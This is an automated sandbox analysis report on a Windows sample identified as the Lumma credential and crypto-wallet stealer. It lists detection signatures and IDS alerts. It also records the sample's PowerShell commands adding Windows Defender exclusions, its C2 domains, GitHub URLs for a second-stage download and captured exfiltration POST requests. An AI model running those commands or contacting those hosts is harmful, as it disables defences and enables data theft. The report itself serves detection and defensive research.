Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
OiMp3TH.exe

Overview

General Information

Sample name:OiMp3TH.exe
Analysis ID:1581343
MD5:ab408f4eb577eda6d98941ede1b44863
SHA1:95035cc5625641877753b56595972972732a7163
SHA256:a3489b28d0560fdb0bb7ab3191ee01e051f96bb4ebb0d979cea7976ebab5139f
Tags:exemalwaretrojanuser-Joker
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
PE file has nameless sections
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Sigma detected: Powershell Defender Exclusion
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • OiMp3TH.exe (PID: 4744 cmdline: "C:\Users\user\Desktop\OiMp3TH.exe" MD5: AB408F4EB577EDA6D98941EDE1B44863)
    • powershell.exe (PID: 6088 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 6188 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users' MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 768 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["cashfuzysao.buzz", "inherineau.buzz", "scentniej.buzz", "appliacnesot.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "hummskitnj.buzz", "prisonyfork.buzz"], "Build id": "nbYRKl--"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000007.00000003.2262593903.000000000074A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        00000007.00000003.2238159093.000000000074A000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: ghhqoznpon_638708802577261661.exe PID: 6396JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
            Process Memory Space: ghhqoznpon_638708802577261661.exe PID: 6396JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Process Memory Space: ghhqoznpon_638708802577261661.exe PID: 6396JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
                Click to see the 1 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OiMp3TH.exe", ParentImage: C:\Users\user\Desktop\OiMp3TH.exe, ParentProcessId: 4744, ParentProcessName: OiMp3TH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf', ProcessId: 6088, ProcessName: powershell.exe
                Sigma detected: Powershell Defender Exclusion
                Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OiMp3TH.exe", ParentImage: C:\Users\user\Desktop\OiMp3TH.exe, ParentProcessId: 4744, ParentProcessName: OiMp3TH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf', ProcessId: 6088, ProcessName: powershell.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf', CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\OiMp3TH.exe", ParentImage: C:\Users\user\Desktop\OiMp3TH.exe, ParentProcessId: 4744, ParentProcessName: OiMp3TH.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\nhrhvnf', ProcessId: 6088, ProcessName: powershell.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T13:11:07.221826+010020283713Unknown Traffic192.168.2.549706172.67.216.236443TCP
                2024-12-27T13:11:09.447823+010020283713Unknown Traffic192.168.2.549707172.67.216.236443TCP
                2024-12-27T13:11:12.014251+010020283713Unknown Traffic192.168.2.549708172.67.216.236443TCP
                2024-12-27T13:11:15.042052+010020283713Unknown Traffic192.168.2.549713172.67.216.236443TCP
                2024-12-27T13:11:17.342320+010020283713Unknown Traffic192.168.2.549715172.67.216.236443TCP
                2024-12-27T13:11:19.972669+010020283713Unknown Traffic192.168.2.549725172.67.216.236443TCP
                2024-12-27T13:11:22.467303+010020283713Unknown Traffic192.168.2.549733172.67.216.236443TCP
                2024-12-27T13:11:27.031637+010020283713Unknown Traffic192.168.2.549744172.67.216.236443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T13:11:08.213577+010020546531A Network Trojan was detected192.168.2.549706172.67.216.236443TCP
                2024-12-27T13:11:10.224644+010020546531A Network Trojan was detected192.168.2.549707172.67.216.236443TCP
                2024-12-27T13:11:28.083267+010020546531A Network Trojan was detected192.168.2.549744172.67.216.236443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T13:11:08.213577+010020498361A Network Trojan was detected192.168.2.549706172.67.216.236443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T13:11:10.224644+010020498121A Network Trojan was detected192.168.2.549707172.67.216.236443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T13:11:15.889620+010020480941Malware Command and Control Activity Detected192.168.2.549713172.67.216.236443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-12-27T13:11:22.470686+010028438641A Network Trojan was detected192.168.2.549733172.67.216.236443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus detection for URL or domain
                Source: https://hummskitnj.buzz/apiAvira URL Cloud: Label: malware
                Source: https://hummskitnj.buzz:443/apiAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeAvira: detection malicious, Label: HEUR/AGEN.1314134
                Found malware configuration
                Source: ghhqoznpon_638708802577261661.exe.6396.7.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["cashfuzysao.buzz", "inherineau.buzz", "scentniej.buzz", "appliacnesot.buzz", "screwamusresz.buzz", "rebuildeso.buzz", "hummskitnj.buzz", "prisonyfork.buzz"], "Build id": "nbYRKl--"}
                Multi AV Scanner detection for submitted file
                Source: OiMp3TH.exeVirustotal: Detection: 25%Perma Link
                Source: OiMp3TH.exeReversingLabs: Detection: 18%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for dropped file
                Source: C:\nhrhvnf\ghhqoznpon_638708802577261661.exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: OiMp3TH.exeJoe Sandbox ML: detected
                Sample uses string decryption to hide its real strings
                Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString decryptor: hummskitnj.buzz
                Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString decryptor: cashfuzysao.buzz
                Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString decryptor: appliacnesot.buzz
                Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString decryptor: screwamusresz.buzz
                Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString decryptor: inherineau.buzz
                Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString decryptor: scentniej.buzz
                Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString decryptor: rebuildeso.buzz
                Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString decryptor: prisonyfork.buzz
                Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString decryptor: hummskitnj.buzz
                Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString decryptor: lid=%s&j=%s&ver=4.0
                Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString decryptor: TeslaBrowser/5.5
                Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString decryptor: - Screen Resoluton:
                Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString decryptor: - Physical Installed Memory:
                Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString decryptor: Workgroup: -
                Source: 00000007.00000002.2362101522.0000000000EA1000.00000040.00000001.01000000.00000007.sdmpString decryptor: nbYRKl--
                Source: unknownHTTPS traffic detected: 20.233.83.145:443 -> 192.168.2.5:49704 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49706 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49707 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49708 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49713 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49715 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49725 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49733 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 172.67.216.236:443 -> 192.168.2.5:49744 version: TLS 1.2
                Source: OiMp3TH.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: C:\Users\Dan\source\repos\pthkkad\pthkkad\obj\Debug\pthkkad.pdb source: OiMp3TH.exe

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49706 -> 172.67.216.236:443
                Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49707 -> 172.67.216.236:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49706 -> 172.67.216.236:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49707 -> 172.67.216.236:443
                Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49713 -> 172.67.216.236:443
                Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49744 -> 172.67.216.236:443
                Source: Network trafficSuricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49733 -> 172.67.216.236:443
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: cashfuzysao.buzz
                Source: Malware configuration extractorURLs: inherineau.buzz
                Source: Malware configuration extractorURLs: scentniej.buzz
                Source: Malware configuration extractorURLs: appliacnesot.buzz
                Source: Malware configuration extractorURLs: screwamusresz.buzz
                Source: Malware configuration extractorURLs: rebuildeso.buzz
                Source: Malware configuration extractorURLs: hummskitnj.buzz
                Source: Malware configuration extractorURLs: prisonyfork.buzz
                Source: global trafficHTTP traffic detected: GET /arizaseeen/ariiiza/raw/refs/heads/main/tpuyikkdktyh.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /arizaseeen/ariiiza/refs/heads/main/tpuyikkdktyh.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                Source: Joe Sandbox ViewIP Address: 185.199.108.133 185.199.108.133
                Source: Joe Sandbox ViewIP Address: 172.67.216.236 172.67.216.236
                Source: Joe Sandbox ViewIP Address: 20.233.83.145 20.233.83.145
                Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.216.236:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49713 -> 172.67.216.236:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 172.67.216.236:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 172.67.216.236:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49715 -> 172.67.216.236:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49725 -> 172.67.216.236:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49733 -> 172.67.216.236:443
                Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49744 -> 172.67.216.236:443
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: hummskitnj.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 42Host: hummskitnj.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=UP3JMVGJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12770Host: hummskitnj.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=VSOVDR18VE0EUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15036Host: hummskitnj.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=6UO45FHKF17435XUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20544Host: hummskitnj.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2MG8UBTKWIZSJUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1260Host: hummskitnj.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=97FF7KQWH025User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 588978Host: hummskitnj.buzz
                Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: hummskitnj.buzz
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /arizaseeen/ariiiza/raw/refs/heads/main/tpuyikkdktyh.exe HTTP/1.1Host: github.comConnection: Keep-Alive
                Source: global trafficHTTP traffic detected: GET /arizaseeen/ariiiza/refs/heads/main/tpuyikkdktyh.exe HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: github.com
                Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
                Source: global trafficDNS traffic detected: DNS query: hummskitnj.buzz
                Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: hummskitnj.buzz
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2287115470.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2183388479.00000000006F8000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2336785101.000000000073E000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238159093.0000000000731000.00000004.00000020.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2262593903.0000000000731000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
                Source: OiMp3TH.exe, 00000000.00000002.4461284237.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.com
                Source: OiMp3TH.exe, 00000000.00000002.4461284237.00000000032D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://github.comd
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
                Source: OiMp3TH.exe, 00000000.00000002.4461284237.000000000330B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
                Source: OiMp3TH.exe, 00000000.00000002.4461284237.000000000330B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.comd
                Source: OiMp3TH.exe, 00000000.00000002.4461284237.0000000003231000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EF3000.00000040.00000001.01000000.00000007.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000001058000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.enigmaprotector.com/
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000002.2362101522.0000000000EF3000.00000040.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.enigmaprotector.com/openU
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2238626600.0000000003977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2239884596.0000000003942000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2290373903.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2266446094.000000000393C000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000002.2363117071.000000000393E000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2303858804.000000000393C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186428733.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186326048.00000000038F8000.00000004.00000800.00020000.00000000.sdmp, ghhqoznpon_638708802577261661.exe, 00000007.00000003.2186249341.00000000038FB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
